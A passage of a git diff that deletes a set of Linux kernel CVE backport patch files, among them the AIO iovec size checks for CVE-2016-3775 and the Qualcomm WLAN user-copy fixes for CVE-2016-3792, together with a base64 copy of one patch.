-index ded94c4fa30d3..9798d4edfd8f2 100644
---- a/fs/aio.c
-+++ b/fs/aio.c
-@@ -977,12 +977,17 @@ static ssize_t aio_setup_vectored_rw(int rw, struct kiocb *kiocb, bool compat)
- 
- static ssize_t aio_setup_single_vector(int rw, struct kiocb *kiocb)
- {
--	if (unlikely(!access_ok(!rw, kiocb->ki_buf, kiocb->ki_nbytes)))
--		return -EFAULT;
-+	size_t len = kiocb->ki_nbytes;
-+
-+	if (len > MAX_RW_COUNT)
-+		len = MAX_RW_COUNT;
-+
-+	if (unlikely(!access_ok(!rw, kiocb->ki_buf, len)))
-+                return -EFAULT;
- 
- 	kiocb->ki_iovec = &kiocb->ki_inline_vec;
- 	kiocb->ki_iovec->iov_base = kiocb->ki_buf;
--	kiocb->ki_iovec->iov_len = kiocb->ki_nbytes;
-+	kiocb->ki_iovec->iov_len = len;
- 	kiocb->ki_nr_segs = 1;
- 	return 0;
- }
diff --git a/Patches/Linux_CVEs/CVE-2016-3775/3.18/0004.patch b/Patches/Linux_CVEs/CVE-2016-3775/3.18/0004.patch
deleted file mode 100644
index 28901d3d..00000000
--- a/Patches/Linux_CVEs/CVE-2016-3775/3.18/0004.patch
+++ /dev/null
@@ -1,48 +0,0 @@
-From b1568c363c54fa3aa98b1cfa7c535115950bec0c Mon Sep 17 00:00:00 2001
-From: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
-Date: Fri, 19 Feb 2016 17:36:21 -0800
-Subject: [PATCH] BACKPORT: AIO: properly check iovec sizes
-
-In Linus's tree, the iovec code has been reworked massively, but in
-older kernels the AIO layer should be checking this before passing the
-request on to other layers.
-
-Many thanks to Ben Hawkes of Google Project Zero for pointing out the
-issue.
-
-Reported-by: Ben Hawkes <hawkes@google.com>
-Acked-by: Benjamin LaHaise <bcrl@kvack.org>
-Tested-by: Willy Tarreau <w@1wt.eu>
-[backported to 3.10 - willy]
-Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
-
-(cherry picked from commit ff19ac8fb71e8a2bf07d61b959062998139c1104)
-Change-Id: I3150b93cf125b03add473dfded89757531b4eb13
-Signed-off-by: Thierry Strudel <tstrudel@google.com>
----
- fs/aio.c | 9 +++++++--
- 1 file changed, 7 insertions(+), 2 deletions(-)
-
-diff --git a/fs/aio.c b/fs/aio.c
-index 58caa7e5d81c6..d9912555aacc8 100644
---- a/fs/aio.c
-+++ b/fs/aio.c
-@@ -1354,11 +1354,16 @@ static ssize_t aio_setup_single_vector(struct kiocb *kiocb,
- 				       unsigned long *nr_segs,
- 				       struct iovec *iovec)
- {
--	if (unlikely(!access_ok(!rw, buf, kiocb->ki_nbytes)))
-+	size_t len = kiocb->ki_nbytes;
-+
-+	if (len > MAX_RW_COUNT)
-+		len = MAX_RW_COUNT;
-+
-+	if (unlikely(!access_ok(!rw, buf, len)))
- 		return -EFAULT;
- 
- 	iovec->iov_base = buf;
--	iovec->iov_len = kiocb->ki_nbytes;
-+	iovec->iov_len = len;
- 	*nr_segs = 1;
- 	return 0;
- }
diff --git a/Patches/Linux_CVEs/CVE-2016-3775/3.4/0001.patch b/Patches/Linux_CVEs/CVE-2016-3775/3.4/0001.patch
deleted file mode 100644
index d707f1d2..00000000
--- a/Patches/Linux_CVEs/CVE-2016-3775/3.4/0001.patch
+++ /dev/null
@@ -1,108 +0,0 @@
-From dc18eac80caaa12ff7072df9fe857b921e8c26c7 Mon Sep 17 00:00:00 2001
-From: Linus Torvalds <torvalds@linux-foundation.org>
-Date: Mon, 21 May 2012 16:06:20 -0700
-Subject: [PATCH] UPSTREAM: vfs: make AIO use the proper rw_verify_area() area
- helpers
-
-We had for some reason overlooked the AIO interface, and it didn't use
-the proper rw_verify_area() helper function that checks (for example)
-mandatory locking on the file, and that the size of the access doesn't
-cause us to overflow the provided offset limits etc.
-
-Instead, AIO did just the security_file_permission() thing (that
-rw_verify_area() also does) directly.
-
-This fixes it to do all the proper helper functions, which not only
-means that now mandatory file locking works with AIO too, we can
-actually remove lines of code.
-
-Bug: 28939037
-Reported-by: Manish Honap <manish_honap_vit@yahoo.co.in>
-Cc: stable@vger.kernel.org
-Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
-(cherry picked from commit a70b52ec1aaeaf60f4739edb1b422827cb6f3893)
-
-Change-Id: I2e182e973b44ba97c45c80d52d8a0b7c32a72750
----
- fs/aio.c | 30 ++++++++++++++----------------
- 1 file changed, 14 insertions(+), 16 deletions(-)
-
-diff --git a/fs/aio.c b/fs/aio.c
-index 67a6db3e1b6f8..e7f2fad7b4ce7 100644
---- a/fs/aio.c
-+++ b/fs/aio.c
-@@ -1456,6 +1456,10 @@ static ssize_t aio_setup_vectored_rw(int type, struct kiocb *kiocb, bool compat)
- 	if (ret < 0)
- 		goto out;
- 
-+	ret = rw_verify_area(type, kiocb->ki_filp, &kiocb->ki_pos, ret);
-+	if (ret < 0)
-+		goto out;
-+
- 	kiocb->ki_nr_segs = kiocb->ki_nbytes;
- 	kiocb->ki_cur_seg = 0;
- 	/* ki_nbytes/left now reflect bytes instead of segs */
-@@ -1467,11 +1471,17 @@ static ssize_t aio_setup_vectored_rw(int type, struct kiocb *kiocb, bool compat)
- 	return ret;
- }
- 
--static ssize_t aio_setup_single_vector(struct kiocb *kiocb)
-+static ssize_t aio_setup_single_vector(int type, struct file * file, struct kiocb *kiocb)
- {
-+	int bytes;
-+
-+	bytes = rw_verify_area(type, file, &kiocb->ki_pos, kiocb->ki_left);
-+	if (bytes < 0)
-+		return bytes;
-+
- 	kiocb->ki_iovec = &kiocb->ki_inline_vec;
- 	kiocb->ki_iovec->iov_base = kiocb->ki_buf;
--	kiocb->ki_iovec->iov_len = kiocb->ki_left;
-+	kiocb->ki_iovec->iov_len = bytes;
- 	kiocb->ki_nr_segs = 1;
- 	kiocb->ki_cur_seg = 0;
- 	return 0;
-@@ -1496,10 +1506,7 @@ static ssize_t aio_setup_iocb(struct kiocb *kiocb, bool compat)
- 		if (unlikely(!access_ok(VERIFY_WRITE, kiocb->ki_buf,
- 			kiocb->ki_left)))
- 			break;
--		ret = security_file_permission(file, MAY_READ);
--		if (unlikely(ret))
--			break;
--		ret = aio_setup_single_vector(kiocb);
-+		ret = aio_setup_single_vector(READ, file, kiocb);
- 		if (ret)
- 			break;
- 		ret = -EINVAL;
-@@ -1514,10 +1521,7 @@ static ssize_t aio_setup_iocb(struct kiocb *kiocb, bool compat)
- 		if (unlikely(!access_ok(VERIFY_READ, kiocb->ki_buf,
- 			kiocb->ki_left)))
- 			break;
--		ret = security_file_permission(file, MAY_WRITE);
--		if (unlikely(ret))
--			break;
--		ret = aio_setup_single_vector(kiocb);
-+		ret = aio_setup_single_vector(WRITE, file, kiocb);
- 		if (ret)
- 			break;
- 		ret = -EINVAL;
-@@ -1528,9 +1532,6 @@ static ssize_t aio_setup_iocb(struct kiocb *kiocb, bool compat)
- 		ret = -EBADF;
- 		if (unlikely(!(file->f_mode & FMODE_READ)))
- 			break;
--		ret = security_file_permission(file, MAY_READ);
--		if (unlikely(ret))
--			break;
- 		ret = aio_setup_vectored_rw(READ, kiocb, compat);
- 		if (ret)
- 			break;
-@@ -1542,9 +1543,6 @@ static ssize_t aio_setup_iocb(struct kiocb *kiocb, bool compat)
- 		ret = -EBADF;
- 		if (unlikely(!(file->f_mode & FMODE_WRITE)))
- 			break;
--		ret = security_file_permission(file, MAY_WRITE);
--		if (unlikely(ret))
--			break;
- 		ret = aio_setup_vectored_rw(WRITE, kiocb, compat);
- 		if (ret)
- 			break;
diff --git a/Patches/Linux_CVEs/CVE-2016-3775/3.4/0002.patch b/Patches/Linux_CVEs/CVE-2016-3775/3.4/0002.patch
deleted file mode 100644
index d9a40c49..00000000
--- a/Patches/Linux_CVEs/CVE-2016-3775/3.4/0002.patch
+++ /dev/null
@@ -1,53 +0,0 @@
-From 6ad77af2e7791e8afd85feef1567aaaab9a748dc Mon Sep 17 00:00:00 2001
-From: Greg Kroah-Hartman <gregkh@google.com>
-Date: Thu, 25 Feb 2016 12:15:48 -0800
-Subject: [PATCH] AIO: properly check iovec sizes
-
-commit ff19ac8fb71e8a2bf07d61b959062998139c1104 upstream
-
-In Linus's tree, the iovec code has been reworked massively, but in
-older kernels the AIO layer should be checking this before passing the
-request on to other layers.
-
-Many thanks to Ben Hawkes of Google Project Zero for pointing out the
-issue.
-
-Bug: 28588279
-
-Backported from 3.10 : Cyanogen
-Conflicts:
-        fs/aio.c
-
-Reported-by: Ben Hawkes <hawkes@google.com>
-Acked-by: Benjamin LaHaise <bcrl@kvack.org>
-Tested-by: Willy Tarreau <w@1wt.eu>
-[backported to 3.10 - willy]
-Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
-Signed-off-by: Greg Kroah-Hartman <gregkh@google.com>
-
-Change-Id: Id11bb629bd6afaf09b9db5a944e2d060972bc0f1
----
-
-diff --git a/fs/aio.c b/fs/aio.c
-index 67a6db3..70a611f 100644
---- a/fs/aio.c
-+++ b/fs/aio.c
-@@ -1469,9 +1469,17 @@
- 
- static ssize_t aio_setup_single_vector(struct kiocb *kiocb)
- {
-+	size_t len = kiocb->ki_nbytes;
-+
-+	if (len > MAX_RW_COUNT)
-+		len = MAX_RW_COUNT;
-+
-+	if (unlikely(!access_ok(!rw, kiocb->ki_buf, len)))
-+                return -EFAULT;
-+
- 	kiocb->ki_iovec = &kiocb->ki_inline_vec;
- 	kiocb->ki_iovec->iov_base = kiocb->ki_buf;
--	kiocb->ki_iovec->iov_len = kiocb->ki_left;
-+	kiocb->ki_iovec->iov_len = len;
- 	kiocb->ki_nr_segs = 1;
- 	kiocb->ki_cur_seg = 0;
- 	return 0;
diff --git a/Patches/Linux_CVEs/CVE-2016-3775/3.4/0002.patch.base64 b/Patches/Linux_CVEs/CVE-2016-3775/3.4/0002.patch.base64
deleted file mode 100644
index d152a37c..00000000
--- a/Patches/Linux_CVEs/CVE-2016-3775/3.4/0002.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
-RnJvbSA2YWQ3N2FmMmU3NzkxZThhZmQ4NWZlZWYxNTY3YWFhYWI5YTc0OGRjIE1vbiBTZXAgMTcgMDA6MDA6MDAgMjAwMQpGcm9tOiBHcmVnIEtyb2FoLUhhcnRtYW4gPGdyZWdraEBnb29nbGUuY29tPgpEYXRlOiBUaHUsIDI1IEZlYiAyMDE2IDEyOjE1OjQ4IC0wODAwClN1YmplY3Q6IFtQQVRDSF0gQUlPOiBwcm9wZXJseSBjaGVjayBpb3ZlYyBzaXplcwoKY29tbWl0IGZmMTlhYzhmYjcxZThhMmJmMDdkNjFiOTU5MDYyOTk4MTM5YzExMDQgdXBzdHJlYW0KCkluIExpbnVzJ3MgdHJlZSwgdGhlIGlvdmVjIGNvZGUgaGFzIGJlZW4gcmV3b3JrZWQgbWFzc2l2ZWx5LCBidXQgaW4Kb2xkZXIga2VybmVscyB0aGUgQUlPIGxheWVyIHNob3VsZCBiZSBjaGVja2luZyB0aGlzIGJlZm9yZSBwYXNzaW5nIHRoZQpyZXF1ZXN0IG9uIHRvIG90aGVyIGxheWVycy4KCk1hbnkgdGhhbmtzIHRvIEJlbiBIYXdrZXMgb2YgR29vZ2xlIFByb2plY3QgWmVybyBmb3IgcG9pbnRpbmcgb3V0IHRoZQppc3N1ZS4KCkJ1ZzogMjg1ODgyNzkKCkJhY2twb3J0ZWQgZnJvbSAzLjEwIDogQ3lhbm9nZW4KQ29uZmxpY3RzOgogICAgICAgIGZzL2Fpby5jCgpSZXBvcnRlZC1ieTogQmVuIEhhd2tlcyA8aGF3a2VzQGdvb2dsZS5jb20+CkFja2VkLWJ5OiBCZW5qYW1pbiBMYUhhaXNlIDxiY3JsQGt2YWNrLm9yZz4KVGVzdGVkLWJ5OiBXaWxseSBUYXJyZWF1IDx3QDF3dC5ldT4KW2JhY2twb3J0ZWQgdG8gMy4xMCAtIHdpbGx5XQpTaWduZWQtb2ZmLWJ5OiBHcmVnIEtyb2FoLUhhcnRtYW4gPGdyZWdraEBsaW51eGZvdW5kYXRpb24ub3JnPgpTaWduZWQtb2ZmLWJ5OiBHcmVnIEtyb2FoLUhhcnRtYW4gPGdyZWdraEBnb29nbGUuY29tPgoKQ2hhbmdlLUlkOiBJZDExYmI2MjliZDZhZmFmMDliOWRiNWE5NDRlMmQwNjA5NzJiYzBmMQotLS0KCmRpZmYgLS1naXQgYS9mcy9haW8uYyBiL2ZzL2Fpby5jCmluZGV4IDY3YTZkYjMuLjcwYTYxMWYgMTAwNjQ0Ci0tLSBhL2ZzL2Fpby5jCisrKyBiL2ZzL2Fpby5jCkBAIC0xNDY5LDkgKzE0NjksMTcgQEAKIAogc3RhdGljIHNzaXplX3QgYWlvX3NldHVwX3NpbmdsZV92ZWN0b3Ioc3RydWN0IGtpb2NiICpraW9jYikKIHsKKwlzaXplX3QgbGVuID0ga2lvY2ItPmtpX25ieXRlczsKKworCWlmIChsZW4gPiBNQVhfUldfQ09VTlQpCisJCWxlbiA9IE1BWF9SV19DT1VOVDsKKworCWlmICh1bmxpa2VseSghYWNjZXNzX29rKCFydywga2lvY2ItPmtpX2J1ZiwgbGVuKSkpCisgICAgICAgICAgICAgICAgcmV0dXJuIC1FRkFVTFQ7CisKIAlraW9jYi0+a2lfaW92ZWMgPSAma2lvY2ItPmtpX2lubGluZV92ZWM7CiAJa2lvY2ItPmtpX2lvdmVjLT5pb3ZfYmFzZSA9IGtpb2NiLT5raV9idWY7Ci0Ja2lvY2ItPmtpX2lvdmVjLT5pb3ZfbGVuID0ga2lvY2ItPmtpX2xlZnQ7CisJa2lvY2ItPmtpX2lvdmVjLT5pb3ZfbGVuID0gbGVuOwogCWtpb2NiLT5raV9ucl9zZWdzID0gMTsKIAlraW9jYi0+a2lfY3VyX3NlZyA9IDA7CiAJcmV0dXJuIDA7Cg==
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/CVE-2016-3792/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-3792/ANY/0001.patch
deleted file mode 100644
index d556ad88..00000000
--- a/Patches/Linux_CVEs/CVE-2016-3792/ANY/0001.patch
+++ /dev/null
@@ -1,336 +0,0 @@
-From 28d4f0c1f712bffb4aa5b47f06e97d5a9fa06d29 Mon Sep 17 00:00:00 2001
-From: Arif Hussain <c_arifh@qca.qualcomm.com>
-Date: Sun, 27 Oct 2013 23:01:14 -0700
-Subject: wlan: Userspace data copy fix
-
-Use copy_to_user and copy_from_user for
-copying data to/from user space.
-
-Change-Id: I07ed5361b439f4bcd61bbf693cc17c950f5b2660
-CRs-Fixed: 561022
----
- CORE/HDD/inc/wlan_hdd_main.h    |   1 +
- CORE/HDD/src/wlan_hdd_hostapd.c | 160 ++++++++++++++++++++++++++++++----------
- 2 files changed, 124 insertions(+), 37 deletions(-)
-
-diff --git a/CORE/HDD/inc/wlan_hdd_main.h b/CORE/HDD/inc/wlan_hdd_main.h
-index 57b2ec0..e3fcca4 100644
---- a/CORE/HDD/inc/wlan_hdd_main.h
-+++ b/CORE/HDD/inc/wlan_hdd_main.h
-@@ -153,6 +153,7 @@
- #define MAC_ADDR_ARRAY(a) (a)[0], (a)[1], (a)[2], (a)[3], (a)[4], (a)[5]
- /** Mac Address string **/
- #define MAC_ADDRESS_STR "%02x:%02x:%02x:%02x:%02x:%02x"
-+#define MAC_ADDRESS_STR_LEN 18 /* Including null terminator */
- #define MAX_GENIE_LEN 255
- 
- #define WLAN_CHIP_VERSION   "WCNSS"
-diff --git a/CORE/HDD/src/wlan_hdd_hostapd.c b/CORE/HDD/src/wlan_hdd_hostapd.c
-index a5d696e..a155932 100644
---- a/CORE/HDD/src/wlan_hdd_hostapd.c
-+++ b/CORE/HDD/src/wlan_hdd_hostapd.c
-@@ -1418,12 +1418,13 @@ static iw_softap_getassoc_stamacaddr(struct net_device *dev,
-                         union iwreq_data *wrqu, char *extra)
- {
-     hdd_adapter_t *pHostapdAdapter = (netdev_priv(dev));
--    unsigned char *pmaclist;
-+    unsigned int maclist_index;
-     hdd_station_info_t *pStaInfo = pHostapdAdapter->aStaInfo;
-+    char maclist_null = '\0';
-     int cnt = 0, len;
- 
- 
--    pmaclist = wrqu->data.pointer + sizeof(unsigned long int);
-+    maclist_index = sizeof(unsigned long int);
-     len = wrqu->data.length;
- 
-     spin_lock_bh( &pHostapdAdapter->staInfo_lock );
-@@ -1431,8 +1432,13 @@ static iw_softap_getassoc_stamacaddr(struct net_device *dev,
-         if (TRUE == pStaInfo[cnt].isUsed) {
-             
-             if(!IS_BROADCAST_MAC(pStaInfo[cnt].macAddrSTA.bytes)) {
--                memcpy((void *)pmaclist, (void *)&(pStaInfo[cnt].macAddrSTA), sizeof(v_MACADDR_t));
--                pmaclist += sizeof(v_MACADDR_t);
-+                if (copy_to_user((void *)wrqu->data.pointer + maclist_index,
-+                    (void *)&(pStaInfo[cnt].macAddrSTA), sizeof(v_MACADDR_t)))
-+                {
-+                    hddLog(LOG1, "%s: failed to copy data to user buffer", __func__);
-+                    return -EFAULT;
-+                }
-+                maclist_index += sizeof(v_MACADDR_t);
-                 len -= sizeof(v_MACADDR_t);
-             }
-         }
-@@ -1440,12 +1446,16 @@ static iw_softap_getassoc_stamacaddr(struct net_device *dev,
-     } 
-     spin_unlock_bh( &pHostapdAdapter->staInfo_lock );
- 
--    *pmaclist = '\0';
--
-+    if (copy_to_user((void *)wrqu->data.pointer + maclist_index,
-+                     (void *)&maclist_null, sizeof(maclist_null)) ||
-+        copy_to_user((void *)wrqu->data.pointer,
-+                     (void *)&wrqu->data.length, sizeof(wrqu->data.length)))
-+    {
-+        hddLog(LOG1, "%s: failed to copy data to user buffer", __func__);
-+        return -EFAULT;
-+    }
-     wrqu->data.length -= len;
- 
--    *(unsigned long int *)(wrqu->data.pointer) = wrqu->data.length;
--
-     return 0;
- }
- 
-@@ -1494,20 +1504,35 @@ static iw_softap_ap_stats(struct net_device *dev,
-     int len = wrqu->data.length;
-     pstatbuf = wrqu->data.pointer;
- 
--    WLANSAP_GetStatistics((WLAN_HDD_GET_CTX(pHostapdAdapter))->pvosContext, &statBuffer, (v_BOOL_t)wrqu->data.flags);
--
--    len = scnprintf(pstatbuf, len,
--            "RUF=%d RMF=%d RBF=%d "
--            "RUB=%d RMB=%d RBB=%d "
--            "TUF=%d TMF=%d TBF=%d "
--            "TUB=%d TMB=%d TBB=%d",
--            (int)statBuffer.rxUCFcnt, (int)statBuffer.rxMCFcnt, (int)statBuffer.rxBCFcnt,
--            (int)statBuffer.rxUCBcnt, (int)statBuffer.rxMCBcnt, (int)statBuffer.rxBCBcnt,
--            (int)statBuffer.txUCFcnt, (int)statBuffer.txMCFcnt, (int)statBuffer.txBCFcnt,
--            (int)statBuffer.txUCBcnt, (int)statBuffer.txMCBcnt, (int)statBuffer.txBCBcnt
--            );
-+    WLANSAP_GetStatistics((WLAN_HDD_GET_CTX(pHostapdAdapter))->pvosContext,
-+                           &statBuffer, (v_BOOL_t)wrqu->data.flags);
- 
-+    pstatbuf = kmalloc(wrqu->data.length, GFP_KERNEL);
-+    if(NULL == pstatbuf) {
-+        hddLog(LOG1, "unable to allocate memory");
-+        return -ENOMEM;
-+    }
-+    len = scnprintf(pstatbuf, wrqu->data.length,
-+                    "RUF=%d RMF=%d RBF=%d "
-+                    "RUB=%d RMB=%d RBB=%d "
-+                    "TUF=%d TMF=%d TBF=%d "
-+                    "TUB=%d TMB=%d TBB=%d",
-+                    (int)statBuffer.rxUCFcnt, (int)statBuffer.rxMCFcnt,
-+                    (int)statBuffer.rxBCFcnt, (int)statBuffer.rxUCBcnt,
-+                    (int)statBuffer.rxMCBcnt, (int)statBuffer.rxBCBcnt,
-+                    (int)statBuffer.txUCFcnt, (int)statBuffer.txMCFcnt,
-+                    (int)statBuffer.txBCFcnt, (int)statBuffer.txUCBcnt,
-+                    (int)statBuffer.txMCBcnt, (int)statBuffer.txBCBcnt);
-+
-+    if (len > wrqu->data.length ||
-+        copy_to_user((void *)wrqu->data.pointer, (void *)pstatbuf, len))
-+    {
-+        hddLog(LOG1, "%s: failed to copy data to user buffer", __func__);
-+        kfree(pstatbuf);
-+        return -EFAULT;
-+    }
-     wrqu->data.length -= len;
-+    kfree(pstatbuf);
-     return 0;
- }
- 
-@@ -1870,8 +1895,15 @@ int iw_get_genie(struct net_device *dev,
-     status = WLANSap_getstationIE_information(pVosContext, 
-                                    &length,
-                                    genIeBytes);
--    wrqu->data.length = VOS_MIN((u_int16_t) length, DOT11F_IE_RSN_MAX_LEN);
--    vos_mem_copy( wrqu->data.pointer, (v_VOID_t*)genIeBytes, wrqu->data.length);
-+    length = VOS_MIN((u_int16_t) length, DOT11F_IE_RSN_MAX_LEN);
-+    if (wrqu->data.length < length ||
-+        copy_to_user(wrqu->data.pointer,
-+                      (v_VOID_t*)genIeBytes, length))
-+    {
-+        hddLog(LOG1, "%s: failed to copy data to user buffer", __func__);
-+        return -EFAULT;
-+    }
-+    wrqu->data.length = length;
-     
-     hddLog(LOG1,FL(" RSN IE of %d bytes returned\n"), wrqu->data.length ); 
-     
-@@ -1885,18 +1917,30 @@ int iw_get_WPSPBCProbeReqIEs(struct net_device *dev,
-                         union iwreq_data *wrqu, char *extra)
- {
-     hdd_adapter_t *pHostapdAdapter = (netdev_priv(dev));    
--    sQcSapreq_WPSPBCProbeReqIES_t *pWPSPBCProbeReqIEs;
-+    sQcSapreq_WPSPBCProbeReqIES_t WPSPBCProbeReqIEs;
-     hdd_ap_ctx_t *pHddApCtx = WLAN_HDD_GET_AP_CTX_PTR(pHostapdAdapter);
-     ENTER();
--        
-+
-     hddLog(LOG1,FL("get_WPSPBCProbeReqIEs ioctl\n"));
--    
--    pWPSPBCProbeReqIEs = (sQcSapreq_WPSPBCProbeReqIES_t *)(wrqu->data.pointer);
--    pWPSPBCProbeReqIEs->probeReqIELen = pHddApCtx->WPSPBCProbeReq.probeReqIELen;
--    vos_mem_copy(pWPSPBCProbeReqIEs->probeReqIE, pHddApCtx->WPSPBCProbeReq.probeReqIE, pWPSPBCProbeReqIEs->probeReqIELen);
--    vos_mem_copy(pWPSPBCProbeReqIEs->macaddr, pHddApCtx->WPSPBCProbeReq.peerMacAddr, sizeof(v_MACADDR_t));
--    wrqu->data.length = 12 + pWPSPBCProbeReqIEs->probeReqIELen;
--    hddLog(LOG1, FL("Macaddress : "MAC_ADDRESS_STR"\n"),  MAC_ADDR_ARRAY(pWPSPBCProbeReqIEs->macaddr));
-+    memset((void*)&WPSPBCProbeReqIEs, 0, sizeof(WPSPBCProbeReqIEs));
-+
-+    WPSPBCProbeReqIEs.probeReqIELen = pHddApCtx->WPSPBCProbeReq.probeReqIELen;
-+    vos_mem_copy(&WPSPBCProbeReqIEs.probeReqIE,
-+                 pHddApCtx->WPSPBCProbeReq.probeReqIE,
-+                 WPSPBCProbeReqIEs.probeReqIELen);
-+    vos_mem_copy(&WPSPBCProbeReqIEs.macaddr,
-+                 pHddApCtx->WPSPBCProbeReq.peerMacAddr,
-+                 sizeof(v_MACADDR_t));
-+    if (copy_to_user(wrqu->data.pointer,
-+                     (void *)&WPSPBCProbeReqIEs,
-+                      sizeof(WPSPBCProbeReqIEs)))
-+    {
-+         hddLog(LOG1, "%s: failed to copy data to user buffer", __func__);
-+         return -EFAULT;
-+    }
-+    wrqu->data.length = 12 + WPSPBCProbeReqIEs.probeReqIELen;
-+    hddLog(LOG1, FL("Macaddress : "MAC_ADDRESS_STR"\n"),
-+           MAC_ADDR_ARRAY(WPSPBCProbeReqIEs.macaddr));
-     up(&pHddApCtx->semWpsPBCOverlapInd);
-     EXIT();
-     return 0;
-@@ -2282,20 +2326,37 @@ static int iw_softap_setwpsie(struct net_device *dev,
-    v_CONTEXT_t pVosContext = (WLAN_HDD_GET_CTX(pHostapdAdapter))->pvosContext;
-    hdd_hostapd_state_t *pHostapdState;
-    eHalStatus halStatus= eHAL_STATUS_SUCCESS;
--   u_int8_t *wps_genie =  wrqu->data.pointer;
-+   u_int8_t *wps_genie;
-+   u_int8_t *fwps_genie;
-    u_int8_t *pos;
-    tpSap_WPSIE pSap_WPSIe;
-    u_int8_t WPSIeType;
-    u_int16_t length;   
-    ENTER();
- 
--   if(!wrqu->data.length)
-+   if(!wrqu->data.length || wrqu->data.length <= QCSAP_MAX_WSC_IE)
-       return 0;
- 
-+   wps_genie = kmalloc(wrqu->data.length, GFP_KERNEL);
-+
-+   if(NULL == wps_genie) {
-+       hddLog(LOG1, "unable to allocate memory");
-+       return -ENOMEM;
-+   }
-+   fwps_genie = wps_genie;
-+   if (copy_from_user((void *)wps_genie,
-+       wrqu->data.pointer, wrqu->data.length))
-+   {
-+       hddLog(LOG1, "%s: failed to copy data to user buffer", __func__);
-+       kfree(fwps_genie);
-+       return -EFAULT;
-+   }
-+
-    pSap_WPSIe = vos_mem_malloc(sizeof(tSap_WPSIE));
-    if (NULL == pSap_WPSIe) 
-    {
-       hddLog(LOGE, "VOS unable to allocate memory\n");
-+      kfree(fwps_genie);
-       return -ENOMEM;
-    }
-    vos_mem_zero(pSap_WPSIe, sizeof(tSap_WPSIE));
-@@ -2312,6 +2373,7 @@ static int iw_softap_setwpsie(struct net_device *dev,
-             if (wps_genie[1] < 2 + 4)
-             {
-                vos_mem_free(pSap_WPSIe); 
-+               kfree(fwps_genie);
-                return -EINVAL;
-             }
-             else if (memcmp(&wps_genie[2], "\x00\x50\xf2\x04", 4) == 0) 
-@@ -2385,6 +2447,7 @@ static int iw_softap_setwpsie(struct net_device *dev,
-                    default:
-                       hddLog (LOGW, "UNKNOWN TLV in WPS IE(%x)\n", (*pos<<8 | *(pos+1)));
-                       vos_mem_free(pSap_WPSIe);
-+                      kfree(fwps_genie);
-                       return -EINVAL; 
-                 }
-               }  
-@@ -2398,6 +2461,7 @@ static int iw_softap_setwpsie(struct net_device *dev,
-          default:
-             hddLog (LOGE, "%s Set UNKNOWN IE %X",__func__, wps_genie[0]);
-             vos_mem_free(pSap_WPSIe);
-+            kfree(fwps_genie);
-             return 0;
-       }
-     } 
-@@ -2411,6 +2475,7 @@ static int iw_softap_setwpsie(struct net_device *dev,
-             if (wps_genie[1] < 2 + 4)
-             {
-                vos_mem_free(pSap_WPSIe); 
-+               kfree(fwps_genie);
-                return -EINVAL;
-             }
-             else if (memcmp(&wps_genie[2], "\x00\x50\xf2\x04", 4) == 0) 
-@@ -2575,6 +2640,7 @@ static int iw_softap_setwpsie(struct net_device *dev,
-     }
-  
-     vos_mem_free(pSap_WPSIe);   
-+    kfree(fwps_genie);
-     EXIT();
-     return halStatus;
- }
-@@ -2682,7 +2748,7 @@ static int iw_set_ap_genie(struct net_device *dev,
-     hdd_adapter_t *pHostapdAdapter = (netdev_priv(dev));
-     v_CONTEXT_t pVosContext = (WLAN_HDD_GET_CTX(pHostapdAdapter))->pvosContext;
-     eHalStatus halStatus= eHAL_STATUS_SUCCESS;
--    u_int8_t *genie = wrqu->data.pointer;
-+    u_int8_t *genie = (u_int8_t *)extra;
-     
-     ENTER();
-     
-@@ -2691,7 +2757,7 @@ static int iw_set_ap_genie(struct net_device *dev,
-         EXIT();
-         return 0;
-     }
--    
-+
-     switch (genie[0]) 
-     {
-         case DOT11F_EID_WPA: 
-@@ -2702,7 +2768,7 @@ static int iw_set_ap_genie(struct net_device *dev,
-                 hdd_softap_Register_BC_STA(pHostapdAdapter, 1);
-             }   
-             (WLAN_HDD_GET_AP_CTX_PTR(pHostapdAdapter))->uPrivacy = 1;
--            halStatus = WLANSAP_Set_WPARSNIes(pVosContext, wrqu->data.pointer, wrqu->data.length);
-+            halStatus = WLANSAP_Set_WPARSNIes(pVosContext, genie, wrqu->data.length);
-             break;
-             
-         default:
-@@ -2768,6 +2834,7 @@ int iw_get_softap_linkspeed(struct net_device *dev,
-    hdd_adapter_t *pHostapdAdapter = (netdev_priv(dev));
-    hdd_context_t *pHddCtx;
-    char *pLinkSpeed = (char*)extra;
-+   char *pmacAddress;
-    v_U32_t link_speed;
-    unsigned short staId;
-    int len = sizeof(v_U32_t)+1;
-@@ -2786,7 +2853,26 @@ int iw_get_softap_linkspeed(struct net_device *dev,
-    }
- 
-    hddLog(VOS_TRACE_LEVEL_INFO, "%s wrqu->data.length= %d\n", __func__, wrqu->data.length);
--   status = hdd_string_to_hex ((char *)wrqu->data.pointer, wrqu->data.length, macAddress );
-+   if (wrqu->data.length != MAC_ADDRESS_STR_LEN)
-+   {
-+       hddLog(LOG1, "Invalid length");
-+       return -EINVAL;
-+   }
-+   pmacAddress = kmalloc(MAC_ADDRESS_STR_LEN, GFP_KERNEL);
-+   if(NULL == pmacAddress) {
-+       hddLog(LOG1, "unable to allocate memory");
-+       return -ENOMEM;
-+   }
-+   if (copy_from_user((void *)pmacAddress,
-+       wrqu->data.pointer, wrqu->data.length))
-+   {
-+       hddLog(LOG1, "%s: failed to copy data to user buffer", __func__);
-+       kfree(pmacAddress);
-+       return -EFAULT;
-+   }
-+
-+   status = hdd_string_to_hex (pmacAddress, wrqu->data.length, macAddress );
-+   kfree(pmacAddress);
- 
-    if (!VOS_IS_STATUS_SUCCESS(status ))
-    {
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-3797/qcacld-2.0/0001.patch b/Patches/Linux_CVEs/CVE-2016-3797/qcacld-2.0/0001.patch
deleted file mode 100644
index bff80ffa..00000000
--- a/Patches/Linux_CVEs/CVE-2016-3797/qcacld-2.0/0001.patch
+++ /dev/null
@@ -1,60 +0,0 @@
-From fdda9c0af64d6e5cdf006e2d8dd57e655821a962 Mon Sep 17 00:00:00 2001
-From: Srinivas Girigowda <sgirigow@qca.qualcomm.com>
-Date: Sun, 10 Apr 2016 00:35:17 -0700
